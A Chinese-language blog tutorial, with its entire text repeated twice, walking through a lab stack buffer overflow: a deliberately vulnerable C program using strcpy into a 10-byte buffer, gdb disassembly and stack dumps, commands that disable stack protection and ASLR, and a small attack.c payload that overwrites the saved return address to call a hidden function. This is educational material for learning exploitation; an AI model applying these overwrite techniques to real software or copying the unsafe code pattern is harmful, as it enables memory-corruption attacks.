缓冲区溢出利用的简单例子
gcc从版本4以后就已经加上了缓冲区溢出攻
击的保护机制(这个以后再讲),所以在gcc的4版本以上进行实验的读者,可以在编译时加上-fno-stack-protector选项来关闭缓冲区溢 -fno-stack-protector这个编译的时候可以不加.
出保护。当然,也可以在更低版本的gcc中实现。
可能每一次gdb调试,分配给程序的虚拟地址空间都不一样,这就给初次做实验的读者构成了很大的不便,可以执行这个
命令echo "0" > /proc/sys/kernel/randomize_va_space
问题如下:
1. ../sysdeps/i386/elf/start.S: No such file or directory.
in ../sysdeps/i386/elf/start.S
是因为在编译时没有加-g 引起,加上后就正常了。
2.在gdb中调试时,变量踪跟
print accum
打印出的值是不正确的(129302998或者是-1749387483),就像我没给它初始化一样,
就算我用print accum=5后,再print accum,也没用的,还是不对,网上查来查去都找不到。
但是我编译出的程序是可以正常运行的,就是gdb 调试不正常,我怀疑是gdb的问题。
先前,我把GCC升级了(4.1.0),而gdb仍然是老版本5.3,所以我下了一个gdb6.6,安装后就正常了。
gdb命令描述
file 装入想要调试的可执行文件.
kill 终止正在调试的程序.
list 列出产生执行文件的源代码的一部分.
next 执行一行源代码但不进入函数内部.
step 执行一行源代码而且进入函数内部.
run 执行当前被调试的程序
quit 终止 gdb
watch 使你能监视一个变量的值而不管它何时被改变.
break 在代码里设置断点, 这将使程序执行到这里时被挂起.
make 使你能不退出 gdb 就可以重新产生可执行文件.
shell 使你能不离开 gdb 就执行 UNIX shell 命令.
利用缓冲区溢出调用bar函数
有个漏洞程序:
#include "stdio.h"
#include "string.h"
void copyout(const char *input){
char buf[10];
strcpy(buf,input);
printf("%s \n",buf);
};
void bar(void){
printf("being hacked\n");
}
int main(int argc,char *argv[]){
copyout(argv[1]);
return 0;
}
利用缓冲区溢出调用bar函数
[dorainm@dorainm lab1]$ vi lab1.c
//编译运行
[dorainm@dorainm lab1]$ gcc lab1.c -o lab1
[dorainm@dorainm lab1]$ ls
lab1 lab1.c
[dorainm@dorainm lab1]$ ./lab1 dorainm
dorainm
[dorainm@dorainm lab1]$
现在我们加入 -ggdb 参数,重新编译,然后用 gdb进行调试
[dorainm@dorainm lab1]$ gcc -g lab1.c -o lab1
[dorainm@dorainm lab1]$ gdb lab1
GNU gdb Red Hat Linux (6.3.0.0-1.122rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) disassemble copyout
Dump of assembler code for function copyout:
0x080483e4 <copyout+0>: push %ebp copyout方法的开始位置
0x080483e5 <copyout+1>: mov %esp,%ebp
0x080483e7 <copyout+3>: sub $0x18,%esp
0x080483ea <copyout+6>: mov 0x8(%ebp),%eax
0x080483ed <copyout+9>: mov %eax,0x4(%esp)
0x080483f1 <copyout+13>: lea 0xfffffff6(%ebp),%eax
0x080483f4 <copyout+16>: mov %eax,(%esp)
0x080483f7 <copyout+19>: call 0x8048330 <__gmon_start__@plt+16>
0x080483fc <copyout+24>: lea 0xfffffff6(%ebp),%eax
0x080483ff <copyout+27>: mov %eax,0x4(%esp)
0x08048403 <copyout+31>: movl $0x8048500,(%esp)
0x0804840a <copyout+38>: call 0x8048310
0x0804840f <copyout+43>: leave
0x08048410 <copyout+44>: ret
End of assembler dump.
(gdb) disassemble bar
Dump of assembler code for function bar:
0x08048411 <bar+0>: push %ebp bar方法的开始位置
0x08048412 <bar+1>: mov %esp,%ebp
0x08048414 <bar+3>: sub $0x8,%esp
0x08048417 <bar+6>: movl $0x8048505,(%esp)
0x0804841e <bar+13>: call 0x80482f0
0x08048423 <bar+18>: leave
0x08048424 <bar+19>: ret
End of assembler dump.
(gdb) disassemble main
Dump of assembler code for function main:
0x08048425 <main+0>: lea 0x4(%esp),%ecx
0x08048429 <main+4>: and $0xfffffff0,%esp
0x0804842c <main+7>: pushl 0xfffffffc(%ecx)
0x0804842f <main+10>: push %ebp
0x08048430 <main+11>: mov %esp,%ebp
0x08048432 <main+13>: push %ecx
0x08048433 <main+14>: sub $0x4,%esp
0x08048436 <main+17>: mov 0x4(%ecx),%eax
0x08048439 <main+20>: add $0x4,%eax
0x0804843c <main+23>: mov (%eax),%eax
0x0804843e <main+25>: mov %eax,(%esp)
0x08048441 <main+28>: call 0x80483e4 <copyout>
0x08048446 <main+33>: mov $0x0,%eax
0x0804844b <main+38>: add $0x4,%esp
0x0804844e <main+41>: pop %ecx
0x0804844f <main+42>: pop %ebp
0x08048450 <main+43>: lea 0xfffffffc(%ecx),%esp
0x08048453 <main+46>: ret
End of assembler dump.
(gdb)
gdb返汇编了copyout3,bar,main,个函数,可以获得3个函数的起始地址,比如我们需要跳到的
bar 函数是0x08048411 的位置,我们要设法把 eip 变成这个值,方法可以直接往 copyout里面10个字节大小的缓冲区填充,让它溢出,把返回的 eip 地址覆盖成 0x08048411,就可以完成革命任务了!
我们在 main 函数处设置断点,然后单步跟踪,看看copyout怎么申明内存空间怎么复制的:)
//设置断点
(gdb) break main
Breakpoint 1 at 0x8048425: file lab1.c, line 17.
//运行,参数是7个字符的dorainm
(gdb) run dorainm dorainm为参数
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": 文件格式错误
Starting program: /home/dorainm/studio/c/exploit/mine/lab1/lab1 dorainm
Reading symbols from shared object read from target memory...done.
Loaded system supplied DSO at 0x323000
Breakpoint 1, main (argc=Cannot access memory at address 0xa2203d7
) at lab1.c:17
17 {
//开始单步跟踪
(gdb) step
main (argc=2, argv=0xbf8a99a4) at lab1.c:18
18 copyout(argv[1]);
//现在我们在main函数里面,argc值是2,main函数的行参在esp入栈后,然后call主函数main的,我们查看寄存器状态可以看到
(gdb) i r
eax 0xbf8a99a4 -1081435740
ecx 0xbf8a9920 -1081435872
edx 0x2 2
ebx 0x9edff4 10412020
esp 0xbf8a9900 0xbf8a9900
ebp 0xbf8a9908 0xbf8a9908
esi 0x8b7cc0 9141440
edi 0x0 0
eip 0x8048436 0x8048436
//main函数中的0x08048436 <main+17>: mov 0x4(%ecx),%eax
eflags 0x200286 2097798
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
//进入copyout之后
//0x08048441 <main+28>: call 0x80483e4 <copyout>
(gdb) step
copyout (input=0xbf8ab97a "dorainm") at lab1.c:7
7 strcpy(buf,input);
//看看寄存器的变化
(gdb) i r
eax 0xbf8ab97a -1081427590
ecx 0xbf8a9920 -1081435872
edx 0x2 2
ebx 0x9edff4 10412020
esp 0xbf8a98e0 0xbf8a98e0
//另一个要关心的就是 esp了,我们看看copyout的ret返回main函数下一条指令的0x08048446 <main+33>: mov $0x0,%eax的eip值,
0x08048446 在栈中的位置,我们在下一步查看esp上下的内存单位
寄存器EBP、ESP、BP和SP称为指针寄存器(Pointer Register),
主要用于存放堆栈内存储单元的偏移量,用它们可实现多种存储器操作数的寻址方式,为以不同的地址形式访问存储单元提供方便。
ebp 0xbf8a98f8 0xbf8a98f8
esi 0x8b7cc0 9141440
edi 0x0 0
eip 0x80483ea 0x80483ea
//变成了copyout里面的0x080483ea <copyout+6>: mov 0x8(%ebp),%eax
指令指针EIP、IP(Instruction Pointer)是存放下次将要执行的指令在代码段的偏移量。
在具有预取指令功能的系统中,下次要执行的指令通常已被预取到指令队列中,除非发生转移情况。所以,在理解它们的功能时,不考虑存在指令队列的情况。
eflags 0x200282 2097794
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
---------------------------
检查内存值
x /NFU ADDR
---------------------------
N代表重复数
---------------------------
U
b :字节(byte)
h :双字节数值
w :四字节数值
g :八字节数值
---------------------------
F
'x' 16进制整数格式
'd' 有符号十进制整数格式
'u' 无符号十进制整数格式
'f' 浮点数格式
---------------------------
(gdb) x/50x 0xbf8a98a0 从0xbf8a98a0开始显示重复50个 x为16进制
0xbf8a98a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbf8a98b0: 0x00000000 0x0177ff8e 0x00000000 0x00000000
0xbf8a98c0: 0x00000000 0x00000000 0x00000001 0x00000000
0xbf8a98d0: 0x00000000 0x00000000 0xbf8ab94c 0x08048370
//这儿就是栈顶了
0xbf8a98e0: 0x009edff4 0x080495f8 0xbf8a98f8 0x080482dd
0xbf8a98f0: 0x009eec80 0xbf8a99b0 0xbf8a9908 0x08048446
//上排最后一个,就是栈中保存着eip的位置,我们要覆盖到这个地址!
0xbf8a9900: 0xbf8ab97a 0xbf8a9920 0xbf8a9978 0x008d47e4
0xbf8a9910: 0x008b7cc0 0x0804845c 0xbf8a9978 0x008d47e4
0xbf8a9920: 0x00000002 0xbf8a99a4 0xbf8a99b0 0x008ab5bb
0xbf8a9930: 0x00000000 0xb7fac690 0x00000001 0x00000001
0xbf8a9940: 0x009edff4 0x008b7cc0 0x00000000 0xbf8a9978
0xbf8a9950: 0xb525dd5e 0x0a2203d7 0x00000000 0x00000000
0xbf8a9960: 0x00000000 0x008b09e0
//执行了strcpy,我们可以看到,dorianm被复制到的栈中的位置
(gdb) step 单步进到copyout方法中
8 printf("%s \n",buf);
(gdb) x/50x 0xbf8a98a0
0xbf8a98a0: 0x00000000 0x0804822a 0x00000000 0x08049614
0xbf8a98b0: 0x008c26d4 0x009edff4 0x008b7cc0 0x00000000
0xbf8a98c0: 0xbf8a98f8 0x008b09e0 0x00000002 0xbf8a9920
0xbf8a98d0: 0x00928b10 0x008b7cc0 0xbf8a98f8 0x080483fc
0xbf8a98e0: 0xbf8a98ee 0xbf8ab97a 0xbf8a98f8 0x6f6482dd
od dorainm输入的参数
0xbf8a98f0: 0x6e696172 0xbf8a006d 0xbf8a9908 0x08048446
niar m ebp eip
main方法中的
0x08048441 <main+28>: call 0x80483e4 <copyout>
0x08048446 <main+33>: mov $0x0,%eax
//dorainm被复制到栈的位置是这样子的,可以看出
//0xbf8a98ee-0xbf8a98f8 10个内存单元是char buf[10],接下来是保护现场入栈的ebp和eip
0xbf8a9900: 0xbf8ab97a 0xbf8a9920 0xbf8a9978 0x008d47e4
0xbf8a9910: 0x008b7cc0 0x0804845c 0xbf8a9978 0x008d47e4
0xbf8a9920: 0x00000002 0xbf8a99a4 0xbf8a99b0 0x008ab5bb
0xbf8a9930: 0x00000000 0xb7fac690 0x00000001 0x00000001
0xbf8a9940: 0x009edff4 0x008b7cc0 0x00000000 0xbf8a9978
0xbf8a9950: 0xb525dd5e 0x0a2203d7 0x00000000 0x00000000
0xbf8a9960: 0x00000000 0x008b09e0
//我们要自己构建一个19大小的字符串(最后一个单元为0,不然printf打印字符串的时候,不知道会在哪地方结束:),其中最后4位是 bar的入口eip,这样子,在copyout结束时,ret,pop eip,bar的地址就会写到eip中,程序就会运行bar函数了
//我们退出调试,编写攻击代码
(gdb)quit
[dorainm@dorainm lab1]$ vi attack.c
#include "stdio.h"
char code[]=
"\x41\x41\x41\x41\x41" /*buf, fill with 'A'*/
"\x41\x41\x41\x41\x41"
"\x42\x42\x42\x42" /*ebp, fill with 'B'*/
"\x11\x84\x04\x08" /*eip*/ 先写低位
"\x00"; /*end*/
int main(void)
{
char *arg[3];
arg[0]="./lab1";
arg[1]=code;
arg[2]=NULL;
execve(arg[0],arg,NULL);
return 0;
}
//然后编译程序
[dorainm@dorainm lab1]$ gcc attack.c -o attack
//运行攻击程序
[dorainm@dorainm lab1]$ ./attack
AAAAAAAAAABBBB
being hacked
段错误
//okay,攻击成功,执行了bar当中的代码(显示了being hacked)
//段错误的原因是,调用bar函数时候,没有保存其父函数的现场,所以没法恢复,程序在完成bar函数后,就不知道要去哪,所以出错:)
[dorainm@dorainm lab1]$
//结束,完成任
gcc从版本4以后就已经加上了缓冲区溢出攻
击的保护机制(这个以后再讲),所以在gcc的4版本以上进行实验的读者,可以在编译时加上-fno-stack-protector选项来关闭缓冲区溢 -fno-stack-protector这个编译的时候可以不加.
出保护。当然,也可以在更低版本的gcc中实现。
可能每一次gdb调试,分配给程序的虚拟地址空间都不一样,这就给初次做实验的读者构成了很大的不便,可以执行这个
命令echo "0" > /proc/sys/kernel/randomize_va_space
问题如下:
1. ../sysdeps/i386/elf/start.S: No such file or directory.
in ../sysdeps/i386/elf/start.S
是因为在编译时没有加-g 引起,加上后就正常了。
2.在gdb中调试时,变量踪跟
print accum
打印出的值是不正确的(129302998或者是-1749387483),就像我没给它初始化一样,
就算我用print accum=5后,再print accum,也没用的,还是不对,网上查来查去都找不到。
但是我编译出的程序是可以正常运行的,就是gdb 调试不正常,我怀疑是gdb的问题。
先前,我把GCC升级了(4.1.0),而gdb仍然是老版本5.3,所以我下了一个gdb6.6,安装后就正常了。
gdb命令描述
file 装入想要调试的可执行文件.
kill 终止正在调试的程序.
list 列出产生执行文件的源代码的一部分.
next 执行一行源代码但不进入函数内部.
step 执行一行源代码而且进入函数内部.
run 执行当前被调试的程序
quit 终止 gdb
watch 使你能监视一个变量的值而不管它何时被改变.
break 在代码里设置断点, 这将使程序执行到这里时被挂起.
make 使你能不退出 gdb 就可以重新产生可执行文件.
shell 使你能不离开 gdb 就执行 UNIX shell 命令.
利用缓冲区溢出调用bar函数
有个漏洞程序:
#include "stdio.h"
#include "string.h"
void copyout(const char *input){
char buf[10];
strcpy(buf,input);
printf("%s \n",buf);
};
void bar(void){
printf("being hacked\n");
}
int main(int argc,char *argv[]){
copyout(argv[1]);
return 0;
}
利用缓冲区溢出调用bar函数
[dorainm@dorainm lab1]$ vi lab1.c
//编译运行
[dorainm@dorainm lab1]$ gcc lab1.c -o lab1
[dorainm@dorainm lab1]$ ls
lab1 lab1.c
[dorainm@dorainm lab1]$ ./lab1 dorainm
dorainm
[dorainm@dorainm lab1]$
现在我们加入 -ggdb 参数,重新编译,然后用 gdb进行调试
[dorainm@dorainm lab1]$ gcc -g lab1.c -o lab1
[dorainm@dorainm lab1]$ gdb lab1
GNU gdb Red Hat Linux (6.3.0.0-1.122rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) disassemble copyout
Dump of assembler code for function copyout:
0x080483e4 <copyout+0>: push %ebp copyout方法的开始位置
0x080483e5 <copyout+1>: mov %esp,%ebp
0x080483e7 <copyout+3>: sub $0x18,%esp
0x080483ea <copyout+6>: mov 0x8(%ebp),%eax
0x080483ed <copyout+9>: mov %eax,0x4(%esp)
0x080483f1 <copyout+13>: lea 0xfffffff6(%ebp),%eax
0x080483f4 <copyout+16>: mov %eax,(%esp)
0x080483f7 <copyout+19>: call 0x8048330 <__gmon_start__@plt+16>
0x080483fc <copyout+24>: lea 0xfffffff6(%ebp),%eax
0x080483ff <copyout+27>: mov %eax,0x4(%esp)
0x08048403 <copyout+31>: movl $0x8048500,(%esp)
0x0804840a <copyout+38>: call 0x8048310
0x0804840f <copyout+43>: leave
0x08048410 <copyout+44>: ret
End of assembler dump.
(gdb) disassemble bar
Dump of assembler code for function bar:
0x08048411 <bar+0>: push %ebp bar方法的开始位置
0x08048412 <bar+1>: mov %esp,%ebp
0x08048414 <bar+3>: sub $0x8,%esp
0x08048417 <bar+6>: movl $0x8048505,(%esp)
0x0804841e <bar+13>: call 0x80482f0
0x08048423 <bar+18>: leave
0x08048424 <bar+19>: ret
End of assembler dump.
(gdb) disassemble main
Dump of assembler code for function main:
0x08048425 <main+0>: lea 0x4(%esp),%ecx
0x08048429 <main+4>: and $0xfffffff0,%esp
0x0804842c <main+7>: pushl 0xfffffffc(%ecx)
0x0804842f <main+10>: push %ebp
0x08048430 <main+11>: mov %esp,%ebp
0x08048432 <main+13>: push %ecx
0x08048433 <main+14>: sub $0x4,%esp
0x08048436 <main+17>: mov 0x4(%ecx),%eax
0x08048439 <main+20>: add $0x4,%eax
0x0804843c <main+23>: mov (%eax),%eax
0x0804843e <main+25>: mov %eax,(%esp)
0x08048441 <main+28>: call 0x80483e4 <copyout>
0x08048446 <main+33>: mov $0x0,%eax
0x0804844b <main+38>: add $0x4,%esp
0x0804844e <main+41>: pop %ecx
0x0804844f <main+42>: pop %ebp
0x08048450 <main+43>: lea 0xfffffffc(%ecx),%esp
0x08048453 <main+46>: ret
End of assembler dump.
(gdb)
gdb返汇编了copyout3,bar,main,个函数,可以获得3个函数的起始地址,比如我们需要跳到的
bar 函数是0x08048411 的位置,我们要设法把 eip 变成这个值,方法可以直接往 copyout里面10个字节大小的缓冲区填充,让它溢出,把返回的 eip 地址覆盖成 0x08048411,就可以完成革命任务了!
我们在 main 函数处设置断点,然后单步跟踪,看看copyout怎么申明内存空间怎么复制的:)
//设置断点
(gdb) break main
Breakpoint 1 at 0x8048425: file lab1.c, line 17.
//运行,参数是7个字符的dorainm
(gdb) run dorainm dorainm为参数
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": 文件格式错误
Starting program: /home/dorainm/studio/c/exploit/mine/lab1/lab1 dorainm
Reading symbols from shared object read from target memory...done.
Loaded system supplied DSO at 0x323000
Breakpoint 1, main (argc=Cannot access memory at address 0xa2203d7
) at lab1.c:17
17 {
//开始单步跟踪
(gdb) step
main (argc=2, argv=0xbf8a99a4) at lab1.c:18
18 copyout(argv[1]);
//现在我们在main函数里面,argc值是2,main函数的行参在esp入栈后,然后call主函数main的,我们查看寄存器状态可以看到
(gdb) i r
eax 0xbf8a99a4 -1081435740
ecx 0xbf8a9920 -1081435872
edx 0x2 2
ebx 0x9edff4 10412020
esp 0xbf8a9900 0xbf8a9900
ebp 0xbf8a9908 0xbf8a9908
esi 0x8b7cc0 9141440
edi 0x0 0
eip 0x8048436 0x8048436
//main函数中的0x08048436 <main+17>: mov 0x4(%ecx),%eax
eflags 0x200286 2097798
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
//进入copyout之后
//0x08048441 <main+28>: call 0x80483e4 <copyout>
(gdb) step
copyout (input=0xbf8ab97a "dorainm") at lab1.c:7
7 strcpy(buf,input);
//看看寄存器的变化
(gdb) i r
eax 0xbf8ab97a -1081427590
ecx 0xbf8a9920 -1081435872
edx 0x2 2
ebx 0x9edff4 10412020
esp 0xbf8a98e0 0xbf8a98e0
//另一个要关心的就是 esp了,我们看看copyout的ret返回main函数下一条指令的0x08048446 <main+33>: mov $0x0,%eax的eip值,
0x08048446 在栈中的位置,我们在下一步查看esp上下的内存单位
寄存器EBP、ESP、BP和SP称为指针寄存器(Pointer Register),
主要用于存放堆栈内存储单元的偏移量,用它们可实现多种存储器操作数的寻址方式,为以不同的地址形式访问存储单元提供方便。
ebp 0xbf8a98f8 0xbf8a98f8
esi 0x8b7cc0 9141440
edi 0x0 0
eip 0x80483ea 0x80483ea
//变成了copyout里面的0x080483ea <copyout+6>: mov 0x8(%ebp),%eax
指令指针EIP、IP(Instruction Pointer)是存放下次将要执行的指令在代码段的偏移量。
在具有预取指令功能的系统中,下次要执行的指令通常已被预取到指令队列中,除非发生转移情况。所以,在理解它们的功能时,不考虑存在指令队列的情况。
eflags 0x200282 2097794
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
---------------------------
检查内存值
x /NFU ADDR
---------------------------
N代表重复数
---------------------------
U
b :字节(byte)
h :双字节数值
w :四字节数值
g :八字节数值
---------------------------
F
'x' 16进制整数格式
'd' 有符号十进制整数格式
'u' 无符号十进制整数格式
'f' 浮点数格式
---------------------------
(gdb) x/50x 0xbf8a98a0 从0xbf8a98a0开始显示重复50个 x为16进制
0xbf8a98a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbf8a98b0: 0x00000000 0x0177ff8e 0x00000000 0x00000000
0xbf8a98c0: 0x00000000 0x00000000 0x00000001 0x00000000
0xbf8a98d0: 0x00000000 0x00000000 0xbf8ab94c 0x08048370
//这儿就是栈顶了
0xbf8a98e0: 0x009edff4 0x080495f8 0xbf8a98f8 0x080482dd
0xbf8a98f0: 0x009eec80 0xbf8a99b0 0xbf8a9908 0x08048446
//上排最后一个,就是栈中保存着eip的位置,我们要覆盖到这个地址!
0xbf8a9900: 0xbf8ab97a 0xbf8a9920 0xbf8a9978 0x008d47e4
0xbf8a9910: 0x008b7cc0 0x0804845c 0xbf8a9978 0x008d47e4
0xbf8a9920: 0x00000002 0xbf8a99a4 0xbf8a99b0 0x008ab5bb
0xbf8a9930: 0x00000000 0xb7fac690 0x00000001 0x00000001
0xbf8a9940: 0x009edff4 0x008b7cc0 0x00000000 0xbf8a9978
0xbf8a9950: 0xb525dd5e 0x0a2203d7 0x00000000 0x00000000
0xbf8a9960: 0x00000000 0x008b09e0
//执行了strcpy,我们可以看到,dorianm被复制到的栈中的位置
(gdb) step 单步进到copyout方法中
8 printf("%s \n",buf);
(gdb) x/50x 0xbf8a98a0
0xbf8a98a0: 0x00000000 0x0804822a 0x00000000 0x08049614
0xbf8a98b0: 0x008c26d4 0x009edff4 0x008b7cc0 0x00000000
0xbf8a98c0: 0xbf8a98f8 0x008b09e0 0x00000002 0xbf8a9920
0xbf8a98d0: 0x00928b10 0x008b7cc0 0xbf8a98f8 0x080483fc
0xbf8a98e0: 0xbf8a98ee 0xbf8ab97a 0xbf8a98f8 0x6f6482dd
od dorainm输入的参数
0xbf8a98f0: 0x6e696172 0xbf8a006d 0xbf8a9908 0x08048446
niar m ebp eip
main方法中的
0x08048441 <main+28>: call 0x80483e4 <copyout>
0x08048446 <main+33>: mov $0x0,%eax
//dorainm被复制到栈的位置是这样子的,可以看出
//0xbf8a98ee-0xbf8a98f8 10个内存单元是char buf[10],接下来是保护现场入栈的ebp和eip
0xbf8a9900: 0xbf8ab97a 0xbf8a9920 0xbf8a9978 0x008d47e4
0xbf8a9910: 0x008b7cc0 0x0804845c 0xbf8a9978 0x008d47e4
0xbf8a9920: 0x00000002 0xbf8a99a4 0xbf8a99b0 0x008ab5bb
0xbf8a9930: 0x00000000 0xb7fac690 0x00000001 0x00000001
0xbf8a9940: 0x009edff4 0x008b7cc0 0x00000000 0xbf8a9978
0xbf8a9950: 0xb525dd5e 0x0a2203d7 0x00000000 0x00000000
0xbf8a9960: 0x00000000 0x008b09e0
//我们要自己构建一个19大小的字符串(最后一个单元为0,不然printf打印字符串的时候,不知道会在哪地方结束:),其中最后4位是 bar的入口eip,这样子,在copyout结束时,ret,pop eip,bar的地址就会写到eip中,程序就会运行bar函数了
//我们退出调试,编写攻击代码
(gdb)quit
[dorainm@dorainm lab1]$ vi attack.c
#include "stdio.h"
char code[]=
"\x41\x41\x41\x41\x41" /*buf, fill with 'A'*/
"\x41\x41\x41\x41\x41"
"\x42\x42\x42\x42" /*ebp, fill with 'B'*/
"\x11\x84\x04\x08" /*eip*/ 先写低位
"\x00"; /*end*/
int main(void)
{
char *arg[3];
arg[0]="./lab1";
arg[1]=code;
arg[2]=NULL;
execve(arg[0],arg,NULL);
return 0;
}
//然后编译程序
[dorainm@dorainm lab1]$ gcc attack.c -o attack
//运行攻击程序
[dorainm@dorainm lab1]$ ./attack
AAAAAAAAAABBBB
being hacked
段错误
//okay,攻击成功,执行了bar当中的代码(显示了being hacked)
//段错误的原因是,调用bar函数时候,没有保存其父函数的现场,所以没法恢复,程序在完成bar函数后,就不知道要去哪,所以出错:)
[dorainm@dorainm lab1]$
//结束,完成任
1333
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
